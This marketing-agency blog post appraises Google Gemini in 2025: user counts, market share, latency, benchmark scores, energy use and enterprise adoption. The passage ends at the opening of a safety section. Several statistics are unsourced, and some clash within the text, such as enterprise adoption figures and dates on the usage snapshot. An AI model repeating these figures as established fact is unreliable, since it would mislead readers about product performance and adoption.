Key Takeaways

- Google Gemini has achieved deep enterprise integration, with over 63% of usage now driven by business applications across high-growth sectors.

- Despite advanced multimodal capabilities and agentic features, Gemini faces ongoing challenges in latency, security, and data privacy.

- Google’s strategic focus on ambient AI and unified infrastructure positions Gemini as a foundational layer across Search, Android, and Workspace.

In the transformative landscape of generative artificial intelligence, Google Gemini in 2025 has emerged as one of the most pivotal advancements, representing Google’s next-generation evolution beyond the original Bard framework. As the global demand for intelligent, agentic, and multimodal AI systems continues to accelerate, Gemini’s sophisticated capabilities—ranging from advanced reasoning to massive context window processing—position it at the forefront of the AI race. This in-depth analysis provides a comprehensive evaluation of Gemini’s current capabilities, ecosystem maturity, enterprise adoption, technological breakthroughs, performance metrics, competitive positioning, and strategic implications within the broader AI industry in 2025.

The Rise of Gemini: From Conversational AI to Thinking Models

Gemini is no longer just an LLM-powered chatbot; it now serves as an ambient, agentic AI system deeply integrated across the Google product stack. From powering AI Overviews in Search for over 1.5 billion users to enabling real-time assistance in Google Workspace, Android, and ChromeOS, Gemini has evolved into a ubiquitous intelligence layer. Notably, the launch of Gemini 2.5 Pro and Gemini 2.5 Flash in the first half of 2025 introduced long-context reasoning, real-time multimodal input handling, function calling, and superior latency-cost tradeoffs, cementing Google’s foothold in both consumer and enterprise markets.

With over 400 million monthly active users and growing adoption across 46% of U.S. enterprises, Gemini is no longer experimental—it is operational, strategic, and foundational. Its integration across platforms like Gmail, Docs, Ads, BigQuery, and Vertex AI demonstrates its central role in automating workflows, enhancing personalization, improving advertising ROI, and enabling real-time decision-making. At its core, Gemini is designed not just to respond, but to reason, act, and adapt across diverse environments, from phones to cloud APIs.

Why 2025 Marks a Turning Point for Generative AI

In 2025, generative AI is entering a new phase—shifting from hype to utility. Organizations are no longer experimenting with isolated use cases. Instead, they are deploying generative models at scale for marketing automation, customer service, medical diagnostics, software development, and data analysis. Google Gemini, with its enhanced prompt adaptability, real-time multi-turn interaction capabilities, and secure enterprise deployment mechanisms via Vertex AI, has strategically aligned with this evolution.

Furthermore, Google’s commitment to fine-tuning, privacy safeguards, ethical AI governance, and benchmark development addresses many of the lingering trust barriers associated with LLMs. This strategic focus not only differentiates Gemini in a crowded AI field, but also ensures it is viable for mission-critical applications that require accuracy, transparency, and robustness.

Key Highlights Covered in This Analysis

This blog delivers an exhaustive review of the current state of Google Gemini in 2025, supported by data, case studies, benchmarks, and platform insights sourced from primary research and industry publications. Specifically, this analysis will cover:

- Enterprise Adoption and Business Impact: Deployment trends across sectors, ROI benchmarks, and case studies from healthcare, finance, and real estate.

- Model Architecture and API Ecosystem: Technical comparison of Gemini 1.5 Pro, 1.5 Flash, and the upcoming Ultra models. Evaluation of token pricing, latency, and use-case suitability.

- Performance Metrics and Fine-Tuning Strategy: Insight into supervised fine-tuning via Vertex AI, metrics like total loss, validation loss, and prompt outcome predictions.

- User Feedback and Platform Reliability: Exploration of user engagement metrics, bug reports, support responsiveness, and performance issues such as infinite loop errors and latency concerns.

- Agentic Capabilities and Plugin Integration: Evaluation of Gemini’s ability to perform real-world actions, schedule tasks, and interact with external tools through APIs.

- Security, Privacy, and Ethical AI Governance: Critical discussion around prompt injection risks, data access controls, regional privacy concerns, and regulatory readiness.

- Competitive Positioning in the AI Ecosystem: Market share comparisons with ChatGPT, Microsoft Copilot, Claude AI, and others, including insights into usage trends and user growth rates.

- Strategic Roadmap and Innovation Pipeline: Coverage of upcoming features such as Deep Think, Gemini Ultra, Search Live, Veo 3, and on-device Gemini Nano deployment via Android 16.

The goal of this report is not only to summarize Gemini’s technical and commercial evolution but also to extract actionable insights for developers, enterprises, investors, and digital strategists seeking to understand how Google’s generative AI platform will shape the next chapter of digital transformation.

By the end of this blog, readers will gain a multidimensional perspective on how Google Gemini is shaping the future of AI in 2025, its technological strengths and shortcomings, and what its continued evolution means for the AI ecosystem as a whole. Whether you’re evaluating Gemini for enterprise deployment, integrating it into consumer-facing apps, or analyzing the broader trajectory of generative AI, this report offers a comprehensive exploration of Google Gemini in 2025.

But before we venture further, we would like to share who we are and what we do.

About AppLabx

From developing a solid marketing plan to creating compelling content, optimizing for search engines, leveraging social media, and utilizing paid advertising, AppLabx offers a comprehensive suite of digital marketing services designed to drive growth and profitability for your business.

At AppLabx, we understand that no two businesses are alike. That’s why we take a personalized approach to every project, working closely with our clients to understand their unique needs and goals, and developing customized strategies to help them achieve success.

If you need a digital consultation, then send in an inquiry here.

The State of Google Gemini in 2025: A Comprehensive Analysis

- Google Gemini in the 2025 AI Landscape

- Usage & Market Penetration

- Performance & Scalability

- Quality & Capabilities

- Safety Architecture & Bias Mitigation

- Business Impact & Enterprise Adoption

- Training & Fine-Tuning Metrics

- User Feedback & Experience

- Custom GPT/Plugin Performance & Ecosystem

- Challenges & Future Outlook

- Strategic Implications

1. Google Gemini in the 2025 AI Landscape

In 2025, Google Gemini represents the apex of Google’s AI-first transformation: no longer an auxiliary technology but the foundational intelligence layer across the company’s digital ecosystem. From powering conversational interfaces to driving multi-step, context-aware automation, Gemini has evolved into a strategic asset embedded into Google’s most widely used consumer and enterprise platforms. This section offers a data-rich deep dive into Gemini’s role in the generative AI marketplace, its integration model, its competitive standing, and how it reflects the broader maturation of the artificial intelligence industry in 2025.

Gemini’s Central Role in Google’s AI Strategy

- Ubiquitous Integration Across Google’s Portfolio

- Gemini is now embedded across Google Search, Android, YouTube, Workspace, and ChromeOS, functioning as a context-aware assistant, real-time content enhancer, and automation orchestrator.

- During Google I/O 2025, “Gemini” was mentioned 147 times, highlighting its critical role as the company’s flagship AI infrastructure.

- Key use cases include:

- AI Overviews in Search reaching 1.5 billion users monthly

- Integration with Docs, Gmail, Meet, and Calendar for intelligent drafting, summarizing, and task management

- Deployment in Android through Gemini Nano for on-device inference

- Diverse Model Suite: Gemini 2.X Family

- Gemini 2.5 Pro: High-context, reasoning-intensive tasks; launched March 2025, GA in June 2025.

- Gemini 2.5 Flash: Optimized for speed and efficiency at scale.

- Gemini 2.5 Flash-Lite: Lightweight, ultra-low-latency variant for embedded and mobile environments.

Model Capability Comparison (July 2025)

| Model Variant | Token Limit | Latency (Avg) | Ideal Use Cases | Cost Efficiency | Reasoning Power |
|---|---|---|---|---|---|
| Gemini 2.5 Pro | 1M+ | 35s | Advanced reasoning, coding | Medium | Very High |
| Gemini 2.5 Flash | 128K | 0.37s | Chatbots, content summarizing | High | Moderate |
| Gemini 2.5 Flash-Lite | 64K | <0.1s | Mobile, wearable AI | Very High | Basic |

Market Position and Strategic Trade-Offs

- Current Market Share Landscape (July 2025)

Despite massive integration, Gemini’s direct chatbot market share remains at 13.5%, trailing behind:

- ChatGPT (60.5%)

- Microsoft Copilot (14.3%)

- Historical Market Trend

| Date | Gemini Market Share (%) |
|---|---|
| Jan 2024 | 16.2 |
| May 2025 | 13.4 |
| July 2025 | 13.5 |

- Interpretation

- The decline in standalone chatbot usage does not fully capture Gemini’s strategic strength.

- Google’s focus lies not in competing for chatbot dominance, but in creating a pervasive, invisible AI layer throughout the user’s digital experience.

- Mobile AI Leadership

- Gemini holds a 32% share in mobile AI use cases, bolstered by deep Android integrations and native low-latency capabilities.

- This positions Gemini as the most-used on-device AI assistant, offering real-time inference and lower privacy risk compared to cloud-only models.

AI Market Dynamics in 2025: Transitioning from Hype to Impact

- Gartner Hype Cycle Positioning (2025)

- Generative AI is now entering the “Trough of Disillusionment”, indicating:

- Market skepticism amid unmet expectations

- A shift in investor and enterprise focus toward value proof and ROI

- AI Investment Overview

- Google allocated $80 billion in 2025 towards AI R&D—one of the largest AI budgets globally.

- Strategic investments target:

- Long-context modeling

- Multimodal reasoning

- Enterprise-grade integrations

- Edge inference capabilities (e.g., Gemini Nano on Android 16)

Workspace and Ecosystem Monetization

- Monetization Through Integration vs. Productization

- Gemini is monetized not primarily through direct access, but by enhancing existing products and platforms:

- Search Ads (via personalized intent matching)

- Workspace (via intelligent document generation)

- Google Cloud (via Vertex AI and Code Assist)

- Engagement Metrics

- Over 2.3 billion document interactions with Gemini-enhanced Workspace tools were recorded in the first half of 2025.

- Demonstrates tangible usage at scale and integration into daily workflows.

- Industry-Specific Use Cases Emerging

- Healthcare: Real-time transcription and summarization for clinical visits.

- Finance: Intelligent report generation and fraud detection using multi-modal inputs.

- Retail: AI-powered dynamic ad creatives and trend prediction via Gemini in Google Ads.

Strategic Interpretation: Integration as a Competitive Moat

- Beyond Chatbots: Ecosystem Entrenchment

- Unlike standalone models that rely on user acquisition via third-party apps, Gemini’s strength lies in zero-friction user exposure through Google’s default products.

- Google’s AI-first roadmap prioritizes:

- Ambient AI experiences

- Multi-device orchestration

- Contextual, real-world interaction support (e.g., Circle to Search, Gemini Live)

- Trade-Offs and Long-Term Positioning

- While market share appears modest in the chatbot category, Google’s strategy is ecosystem domination, not feature parity.

- The network effect of embedding AI into Search, Android, and Workspace results in exponential reach, engagement, and monetization potential.

Summary Matrix: Gemini’s 2025 Strategic Position

| Strategic Dimension | Performance Summary |
|---|---|
| Chatbot Market Share | Moderate (13.5%) but stable |
| Ecosystem Integration | Deep (Search, Workspace, Android, ChromeOS) |
| User Reach | 1.5B+ in Search, 400M MAU in Gemini App |
| Enterprise Penetration | 46% of Fortune 500 evaluated Gemini APIs |
| Investment in AI | $80B in 2025 R&D spending |
| Mobile AI Dominance | Leading with 32% mobile AI market share |
| AI Monetization Strategy | Integrated monetization through existing services |
| Technical Leadership | Advanced model diversity with long-context reasoning |

Conclusion

Google Gemini’s trajectory in 2025 reflects the broader evolution of generative AI from experimental novelty to foundational enterprise infrastructure. Despite its modest chatbot market share, Gemini’s deep integration, multi-device presence, and robust enterprise positioning underscore Google’s strategic focus on AI as a universal utility. As the generative AI landscape matures and moves toward outcome-based adoption, Gemini’s embedded intelligence across billions of daily interactions may prove more consequential than market share metrics alone.

2. Usage & Market Penetration

By mid-2025, Google Gemini has firmly positioned itself as one of the most widely adopted AI systems in the world, bridging both enterprise productivity and consumer creativity. Its usage trajectory has been marked by rapid growth, granular demographic reach, and deep ecosystem integration, illustrating its transformation from an experimental LLM interface to a cornerstone of Google’s ambient AI infrastructure. Below is a multi-dimensional analysis of Gemini’s market penetration, user demographics, geographic distribution, engagement patterns, and strategic positioning.

Explosive Growth in User Base and Interaction Metrics



- Total Monthly Active Users (MAUs)

- Reached 400 million MAUs by mid-2025

- Significant growth from 350 million MAUs in March 2025

- Reflects a 344% increase in monthly users since October 2024

- Daily Active Users (DAUs)

- Increased from 9 million in October 2024 to 35 million by mid-2025

- Demonstrates a growing dependence on Gemini for daily workflows

- Session & Platform Engagement

- Average engagement time: 11.4 minutes across all Google Gemini interfaces

- Standalone Gemini chatbot (Feb 2025):

- Desktop: 3 min 47 sec

- Mobile: 6 min 44 sec

- Average pages per session:

- Desktop: 2.92

- Mobile: 4.06

- Increased mobile engagement suggests successful Android integration and user reliance in mobile-first markets
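The growth figures above can be cross-checked with a few lines of arithmetic. The sketch below is only a consistency check on the numbers quoted in this section: it assumes the "344% increase" means growth of +344% over the October 2024 baseline (an interpretation, since the baseline itself is not stated), and the variable names are illustrative.

```python
# Figures quoted in the bullets above, in millions of users.
mau_mid_2025 = 400.0
mau_march_2025 = 350.0
dau_oct_2024 = 9.0
dau_mid_2025 = 35.0

# Assumption: "344% increase" is read as new = old * (1 + 3.44).
mau_increase_since_oct_2024 = 3.44


def percent_increase(old: float, new: float) -> float:
    """Relative growth from old to new, expressed in percent."""
    return (new - old) / old * 100.0


# October 2024 MAU baseline implied by the quoted growth rate.
implied_mau_oct_2024 = mau_mid_2025 / (1.0 + mau_increase_since_oct_2024)

# DAU growth over the same period and MAU growth since March 2025.
dau_growth = percent_increase(dau_oct_2024, dau_mid_2025)
mau_growth_since_march = percent_increase(mau_march_2025, mau_mid_2025)

# DAU/MAU ratio, a common "stickiness" indicator.
stickiness = dau_mid_2025 / mau_mid_2025 * 100.0

print(f"Implied Oct 2024 MAU: {implied_mau_oct_2024:.1f}M")
print(f"DAU growth since Oct 2024: {dau_growth:.1f}%")
print(f"MAU growth since Mar 2025: {mau_growth_since_march:.1f}%")
print(f"DAU/MAU ratio: {stickiness:.2f}%")
```

Under that reading, the implied October 2024 baseline is roughly 90 million MAUs, and the DAU/MAU ratio of under 9% suggests that most monthly users are still occasional rather than daily users.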

Web & Chatbot Usage Metrics Snapshot (February 2025)

| Metric | Value | Platform / Notes |
|---|---|---|
| Monthly Active Users (MAU) | 400 million | All platforms combined |
| Daily Active Users (DAU) | 35 million | All platforms combined |
| Total Monthly Visits | 284.1 million | Gemini chatbot (web/mobile) |
| Unique Monthly Visitors | 67.29 million | Gemini chatbot |
| Avg. Visit Duration (Overall) | 4 min 37 sec | Chatbot web/mobile interface |
| Avg. Visit Duration (Mobile) | 6 min 44 sec | Indicates deeper session interaction |
| Bounce Rate (Mobile) | 44.78% | Higher than desktop |
| Top Use Case | Research (40%) | Followed by creative and productivity |
| Enterprise Usage | 63% of total usage | Strong B2B penetration |
| Consumer Content Creation | 58% of generated outputs | Creative tasks, summaries, generation |

Geographic Reach and Global Expansion Strategy

- Top Traffic Sources (February 2025)

| Country | Traffic Share (%) |
|---|---|
| United States | 17.54% |
| India | 9.04% |
| Indonesia | 5.25% |
| Brazil | 4.48% |
| Vietnam | 4.36% |

- Global Coverage

- Gemini is deployed in 182 countries, reaching 93% of internet-connected regions

- Emerging markets such as India and Brazil account for 22% of new user activations in 2025

- Strategic expansion supported by automated multilingual support in 130+ languages

- Spanish, Hindi, and Arabic comprise 39% of non-English translation usage

- Localization Advantage

- Gemini’s real-time multilingual reasoning and localization tools enhance its accessibility in mobile-first and linguistically diverse markets

- Google’s cloud infrastructure and Android OS penetration accelerate Gemini’s diffusion in the Global South

Demographics: Who Uses Gemini in 2025?

- Age Group Distribution

| Age Group | User Share (%) |
|---|---|
| 18–24 | 24.3% |
| 25–34 | 29.7% (Largest group) |
| 35–44 | 18.5% |
| 45+ | 27.5% |

- Gender Distribution

- Male users: 57.98%

- Female users: 42.02%

- Key Demographic Insights

- 54% of Gemini users are aged 18–34 (24.3% + 29.7%), indicating high affinity among digitally native professionals and students

- Gender distribution reflects broader tech usage trends but suggests growth potential in female-oriented marketing and user onboarding

Use Case Diversification: Enterprise & Consumer Balance

- Top Use Cases

| Functionality | Usage Share (%) |
|---|---|
| Research & Fact-checking | 40% |
| Creative Projects | 30% |
| Productivity Tools | 20% |
| Entertainment | 10% |

- B2B vs. Consumer Dynamics

- 63% of total usage stems from enterprise-level accounts, highlighting strong integration with Google Workspace and Vertex AI

- 58% of content outputs (e.g., summaries, reports, creative writing) are generated by individual consumer users

- Strategic Implication

- Gemini supports dual monetization pathways:

- Enterprise: Focus on automation, AI-driven documentation, and knowledge management

- Consumer: Focus on content generation, learning assistance, and creative ideation

Summary Matrix: Google Gemini Usage and Penetration (2025)

| Dimension | Key Performance Indicator (2025) |
|---|---|
| Total MAUs | 400 million |
| Daily Active Users | 35 million |
| Avg. Visit Duration (Mobile) | 6 minutes 44 seconds |
| Pages per Mobile Visit | 4.06 |
| Enterprise Usage Share | 63% of total usage |
| Consumer Output Share | 58% of generated content |
| Global Coverage | 182 countries (93% of internet-connected regions) |
| New Activations (India & Brazil) | 22% of new user activations |
| Top Use Case | Research (40%) |
| Multilingual Reach | 130+ languages supported |

Strategic Interpretation: Gemini’s Hybrid Market Penetration Model

- Gemini’s user adoption is not solely attributable to chatbot interest, but rather to its wide-scale embedding across Google’s infrastructure—particularly in Android and Workspace.

- Its mobile-first engagement metrics, linguistic flexibility, and strong enterprise adoption point to a hybrid penetration model that captures both:

- Volume-based consumer interaction

- Value-based enterprise deployment

- This approach allows Google to sidestep the competitive pressures of isolated chatbot usage metrics and instead build an ambient, AI-powered ecosystem that reinforces loyalty and usage across services.

Conclusion

In 2025, Google Gemini has moved beyond being a mere generative AI tool into becoming a global productivity enabler and content partner. Its vast user base, deep market penetration across demographics and geographies, and dual appeal to enterprises and consumers make it a central pillar of Google’s AI strategy. Its data-backed usage surge reflects not just product maturity, but a broader evolution of how AI is being normalized into daily life—quietly, pervasively, and effectively.

3. Performance & Scalability

The performance architecture of Google Gemini in 2025 reflects a highly segmented and targeted approach to large language model (LLM) optimization. While some models within the Gemini 2.X family offer state-of-the-art inference speed and computational efficiency, others face latency and scalability issues that reveal the inherent trade-offs between raw capability and real-time responsiveness. This section dissects both ends of Gemini’s performance spectrum, its evolving infrastructure, and the sustainability innovations that underpin its scale.

Divergence in Speed Across Model Variants



- Gemini 2.0 Flash

- Delivers ultra-fast inference speed at approximately 263 tokens/second, placing it among the fastest mainstream LLMs.

- Engineered specifically for low-latency, high-throughput use cases such as real-time summarization and chatbot deployment.

- Gemini 1.5 Flash-8B

- Achieves a time-to-first-token (TTFT) of just 0.33 seconds, with a peak throughput of ~280.8 tokens/second.

- Ideal for compact prompts and environments that demand immediate feedback with minimal overhead.

- Gemini 2.5 Pro

- Although it excels in advanced reasoning, coding, and multi-turn task planning, it suffers from significant latency:

- Average response time: ~35 seconds

- 99th percentile latency: up to 8 minutes

- Some requests report durations exceeding 7 minutes, especially via the `generate_content` endpoint.

- This model is optimized for quality and depth of reasoning, but with trade-offs in responsiveness.

Latency Management through API Differentiation

To accommodate varying developer needs and mitigate high-latency use cases, Google introduced:

- Batch Mode API

- Designed for non-real-time large-scale processing.

- Offers up to 50% cost reduction on token usage.

- Response window: up to 24 hours, supporting asynchronous tasks such as document summarization and code analysis.
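To illustrate the cost trade-off described above, here is a minimal sketch of how a team might compare interactive and batch pricing for a job. The per-million-token prices are hypothetical placeholders rather than Google's published rates, and the 50% figure is the upper bound quoted above, so real savings may be smaller.

```python
from dataclasses import dataclass

# "Up to 50% cost reduction" from the text; treated here as a flat discount.
BATCH_DISCOUNT = 0.50


@dataclass(frozen=True)
class Job:
    """Token volume for one workload (illustrative structure)."""
    input_tokens: int
    output_tokens: int


def job_cost(
    job: Job,
    input_price_per_million: float,
    output_price_per_million: float,
    batch: bool = False,
) -> float:
    """Estimate cost in the same currency as the supplied prices."""
    cost = (
        job.input_tokens / 1_000_000 * input_price_per_million
        + job.output_tokens / 1_000_000 * output_price_per_million
    )
    return cost * (1.0 - BATCH_DISCOUNT) if batch else cost


# Hypothetical prices (USD per million tokens), chosen only for illustration.
nightly_summaries = Job(input_tokens=2_000_000, output_tokens=500_000)
interactive = job_cost(nightly_summaries, 1.00, 4.00)
batched = job_cost(nightly_summaries, 1.00, 4.00, batch=True)
print(f"interactive: ${interactive:.2f}, batch: ${batched:.2f}")
```

The saving only applies to work that can tolerate the 24-hour response window, so a comparison like this is most useful for nightly or weekly pipelines rather than user-facing requests.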

Service Reliability and API Scalability Challenges

Reports from developer forums and telemetry logs in mid-2025 reveal intermittent API reliability concerns:

| API Service | Reported Issue (Jul 2025) | Impact Level |
|---|---|---|
| Gemini 2.0 Flash | “Service Unavailable” errors | Moderate |
| Gemini 2.5 Flash | Rate limiting exceptions | High in bursts |
| Gemini 2.5 Pro | Long tail latency | High |

- Uptime monitoring is available via Google Cloud Monitoring, but SLAs for Gemini-specific APIs remain opaque.

- Developers emphasize the need for:

- Transparent SLA documentation

- Predictable rate limit thresholds

- More granular latency metrics per endpoint
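Until rate limits and SLAs are better documented, a common client-side mitigation for intermittent "Service Unavailable" and rate-limit errors is retrying with exponential backoff and jitter. The sketch below is generic and not tied to any Gemini SDK: `TransientError` and the `call` argument are hypothetical stand-ins for whatever exception and request function a real client exposes.

```python
import random
import time
from typing import Callable, TypeVar

T = TypeVar("T")


class TransientError(Exception):
    """Hypothetical stand-in for a 503 or rate-limit error from a client."""


def call_with_backoff(
    call: Callable[[], T],
    max_attempts: int = 5,
    base_delay: float = 1.0,
    max_delay: float = 30.0,
    sleep: Callable[[float], None] = time.sleep,
) -> T:
    """Run call(), retrying transient failures with capped, jittered delays."""
    if max_attempts < 1:
        raise ValueError("max_attempts must be at least 1")
    for attempt in range(max_attempts):
        try:
            return call()
        except TransientError:
            if attempt == max_attempts - 1:
                raise  # out of attempts: surface the last error
            # Delay ceiling doubles per attempt, capped at max_delay.
            ceiling = min(max_delay, base_delay * 2 ** attempt)
            # Full jitter spreads retries out so clients do not retry in sync.
            sleep(random.uniform(0.0, ceiling))
    raise AssertionError("unreachable")


# Usage: a fake request that fails twice, then succeeds.
attempts = {"count": 0}


def flaky_request() -> str:
    attempts["count"] += 1
    if attempts["count"] < 3:
        raise TransientError("service unavailable")
    return "ok"


recorded_delays: list[float] = []
result = call_with_backoff(flaky_request, sleep=recorded_delays.append)
print(result, attempts["count"], len(recorded_delays))
```

Backoff helps with bursty rate limiting, but it does nothing for the long-tail latency reported for Gemini 2.5 Pro; that case needs request timeouts or asynchronous processing instead.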

Scalability Anchored in Sustainable AI Infrastructure

To power the massive computational demands of Gemini, Google has reengineered its AI infrastructure around both efficiency and environmental responsibility:

Infrastructure Innovations

- Ironwood TPUs (2025)

- 30x more efficient than TPUs from 2018

- Enables 6x more compute per watt, directly improving LLM training throughput and inference cost-efficiency

- Energy Metrics

- Data Center Energy Use: +27% year-over-year (due to increased LLM operations)

- Emissions Reduction: −12% in 2024, owing to infrastructure upgrades and clean energy sourcing

Clean Energy Commitments

| Metric | Value (2024–2025) |
|---|---|
| Clean Energy Agreements Signed | Over 8GW of new capacity |
| Green Power % for AI Data Centers | Over 65% coverage |
| Carbon Emissions from AI Workloads | Net reduction despite scale |

This green infrastructure strategy allows Google to:

- Contain long-term LLM operational costs

- Position Gemini as a climate-aligned AI platform

- Mitigate regulatory risk tied to environmental impact disclosures

Segmented Model Strategy: Performance vs. Precision

Google’s diversified model architecture supports a dual-path strategy:

| Model Variant | Core Purpose | Trade-off |
|---|---|---|
| Gemini Flash | Real-time tasks, low cost, low latency | Limited depth, reasoning capability |
| Gemini Pro | Advanced logic, coding, multi-step tasks | High latency, cost-intensive |
| Gemini Flash-Lite | Mobile-optimized, resource constrained | Minimal model size, faster boot-up |

- This strategic segmentation enables:

- Tailored AI applications for consumer vs. enterprise

- Optimization of cost-performance ratio across industries

- Dynamic routing in hybrid inference environments
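Dynamic routing of this kind can be sketched as a simple selection rule: pick the strongest model whose typical latency fits the request's budget. The example below uses the average latencies and reasoning levels from the model capability comparison table in Section 1; the numeric reasoning tiers, the model labels, and the `route` function are illustrative assumptions, not a Google API.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ModelProfile:
    name: str              # illustrative label, not a verified API model ID
    avg_latency_s: float   # average latency from the comparison table
    reasoning_tier: int    # assumed scale: 1 = Basic, 2 = Moderate, 3 = Very High


PROFILES = [
    ModelProfile("gemini-2.5-pro", 35.0, 3),
    ModelProfile("gemini-2.5-flash", 0.37, 2),
    # The table lists "<0.1s"; 0.1 is used here as a conservative upper bound.
    ModelProfile("gemini-2.5-flash-lite", 0.1, 1),
]


def route(latency_budget_s: float, min_reasoning_tier: int = 1) -> Optional[ModelProfile]:
    """Return the most capable profile that fits the latency budget, if any."""
    candidates = [
        p for p in PROFILES
        if p.avg_latency_s <= latency_budget_s
        and p.reasoning_tier >= min_reasoning_tier
    ]
    return max(candidates, key=lambda p: p.reasoning_tier, default=None)


# Usage: a chat turn with a 1-second budget versus an offline analysis job.
chat_choice = route(latency_budget_s=1.0)
offline_choice = route(latency_budget_s=60.0)
impossible = route(latency_budget_s=0.2, min_reasoning_tier=2)
print(chat_choice.name, offline_choice.name, impossible)
```

A production router would also weigh cost and tail latency rather than averages alone, which matters given the long-tail behaviour reported for Gemini 2.5 Pro.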

Conclusion: The Scalability Imperative

The state of Google Gemini’s performance in 2025 reflects a balancing act between innovation and infrastructure maturity. Google’s approach—comprising model specialization, energy-efficient infrastructure, and progressive batching—demonstrates a comprehensive response to the evolving demands of AI at scale. However, sustaining this trajectory will require transparent API management, reduced latency for flagship models, and continued investment in edge-capable inference to meet the demands of real-time, global AI deployments.

The performance landscape of Gemini underscores that in the race for LLM leadership, raw capability must be matched with operational dependability, developer trust, and sustainable scale. This intricate balance will ultimately determine Google Gemini’s longevity and influence in the AI-driven digital economy.

4. Quality & Capabilities

In 2025, Google Gemini has made transformative strides in AI capability, marked by a strategic pivot towards building deeply intelligent, “thinking models.” These models, under the Gemini 2.X architecture, do not merely mimic human output—they simulate cognitive processes, enabling a structured internal reasoning mechanism before generating a response. This evolution represents Google’s conscious departure from pattern-based generation toward models that emphasize explainability, trust, and autonomous decision-making.

Intelligent Reasoning: Beyond Pattern Matching

Gemini 2.5 Pro exemplifies a new frontier in reasoning and logical problem-solving:

- Internal Thought Modeling:

- Designed to emulate structured thinking paths, enabling more accurate, explainable outcomes.

- Ideal for multi-step queries, domain-specific logic tasks, and scientific reasoning.

- Reduces hallucinations by grounding outputs in an internal reasoning framework.





- Benchmark Leadership:

- Achieved 18.8% on Humanity’s Last Exam, a dataset designed to test human-level knowledge without external tools.

- Surpasses competitors such as Claude 3.7 Sonnet (8.9%) and o3-mini (14%).

- MMLU Score: 93.4% — the highest among commercial models as of 2025.

- Big-Bench Hard (BBH): 87.9%, outperforming GPT-4 by 3.8 percentage points.

Coding Prowess: Agentic Programming and Code Generation

Gemini’s programming capabilities have advanced significantly, with a focus on agentic development workflows:

- Gemini 2.5 Pro:

- Excels in code transformation, debugging, and multi-file application generation.

- Scores 63.8% on SWE-Bench Verified (agent-augmented), ahead of o3-mini but behind Claude 3.7 Sonnet.

- Performance on Key Code Benchmarks:

- HumanEval (Python): 81% code generation accuracy.

- LiveCodeBench v5: 70.4% single-attempt pass rate, narrowly behind Grok 3 Beta (70.6%) and further behind o3-mini (74.1%).

- WebDev Arena:

- Attains an ELO rating of 1415, establishing itself as the top human-preferred model in coding tasks.

Multimodal Dominance: A True All-Format Intelligence System

Gemini’s models are natively multimodal, designed to ingest and process text, image, audio, video, and code through a unified interface:

- Context Window Capability:

- Supports a 1 million-token context window, with 2 million tokens under development.

- Allows processing of:

- Up to 1,500 pages of documentation

- Over 11 hours of audio/video

- More than 30,000 lines of code

- Video Processing:

- Can analyze up to 3 hours of high-fidelity video in a single inference cycle.

- Visual Reasoning:

- Achieves 89.3% accuracy in multimodal benchmarks, outperforming most commercial alternatives.

Human-Centric Design: Learning, Preference, and Evaluation

Google’s focus on aligning model output with real-world utility is reflected in human feedback systems and learning model integration:

- LMArena Leaderboard:

- Gemini 2.5 Pro tops human preference ratings, indicating superior response coherence, logic, and usefulness.

- LearnLM Integration:

- Developed with educational specialists, now embedded in Gemini 2.5 Pro.

- Results:

- Outperforms other LLMs in educational use cases.

- Preferred by educators in over 80% of scenario-based evaluations.

Consistency, Hallucinations, and Reliability

Despite substantial improvements, Gemini—like all advanced LLMs—grapples with maintaining accuracy across all domains:

- Reduced Hallucinations in Reasoning Tasks:

- Achieved <2.7% hallucination rate in zero-shot reasoning contexts.

- Represents the lowest known rate among frontier models as of mid-2025.

- Discrepancy in Broader Evaluations:

- On factual benchmarks, Gemini’s hallucination rate reaches 37%, still outperforming GPT-4o at 60%.

- Suggests variance by task complexity and evaluation method.

- Acknowledged Limitations:

- Gemini may still fabricate links or generate factually incorrect content in open-ended tasks.

- Google continues to invest in “grounded generation” and reference verification mechanisms.

Gemini 2025 Performance Matrix

| Category | Model | Benchmark | Score / Metric | Comparative Performance |
|---|---|---|---|---|
| Reasoning | Gemini 2.5 Pro | Humanity’s Last Exam | 18.8% | Beats Claude 3.7 (8.9%), o3-mini (14%) |
| Reasoning | Gemini 1.5 Ultra | MMLU | 93.4% | Highest among commercial models |
| Reasoning | Gemini 1.5 Ultra | BBH | 87.9% | +3.8% over GPT-4 |
| Coding | Gemini 2.5 Pro | SWE-Bench Verified | 63.8% | Beats o3-mini (61%), trails Claude 3.7 (70.3%) |
| Coding | Gemini | HumanEval (Python) | 81% | High accuracy in code generation |
| Coding | Gemini 2.5 Pro | LiveCodeBench v5 | 70.4% | Just behind Grok 3 (70.6%) and o3-mini (74.1%) |
| Coding | Gemini 2.5 Pro | WebDev Arena | 1415 ELO | Ranked #1 in human-preferred coding tasks |
| Multimodality | Gemini 2.5 Pro | Context Window | 1M tokens (2M soon) | Supports long-form content and codebase ingestion |
| Multimodality | Gemini 2.5 Pro | Video Processing | 3 hours | Real-time multimodal analysis |
| Multimodality | Gemini | Visual Reasoning | 89.3% | Market-leading visual cognition |
| Learning & Human Testing | Gemini 2.5 Pro | LearnLM Pedagogical Trials | Preferred by educators | Outperforms top-tier models in education tasks |
| Speed | Gemini 2.0 Flash | Text Generation | 263 tokens/second | Among fastest in the LLM category |
| Speed | Gemini Flash-8B | Time to First Token (TTFT) | 0.33 seconds | Industry-leading latency optimization |
| Hallucination Rates | Gemini | Zero-Shot Tasks | <2.7% | Lowest reported in 2025 |
| Hallucination Rates | Gemini | Factual Tasks | 37% | Lower than GPT-4o (60%) |

Conclusion: A Mature AI Built for Impact

Google Gemini’s capabilities in 2025 represent a significant convergence of performance, precision, and purpose. It is not merely advancing in technical benchmarks but is increasingly calibrated toward real-world deployment across domains such as education, software development, research, and content generation.

Gemini’s internal reasoning, robust multimodal capacity, and domain-aligned optimization underscore a strategic vision that prioritizes not only model strength but also trust, explainability, and user alignment. As AI applications mature, Gemini is well-positioned to lead a new era of intelligent, versatile, and human-centric language models.

5. Safety Architecture & Bias Mitigation

In 2025, Google Gemini sits at the nexus of AI innovation and global scrutiny. As artificial intelligence capabilities scale rapidly, so too do expectations around responsible deployment, ethical safeguards, and regulatory adherence. Google’s approach to safety, compliance, and responsible AI in Gemini reflects both tangible advancements and ongoing tensions—between utility and ethics, innovation and privacy, automation and oversight.

Safety Architecture and Model Behavior Enhancements

Advancements in Safety and Helpfulness

- Gemini 2.5 represents a step-change in model alignment compared to its predecessors.

- Users and researchers report significantly fewer instances of over-refusal or sanctimonious behavior.

- The models are more responsive to complex and critical queries while maintaining moderation standards.

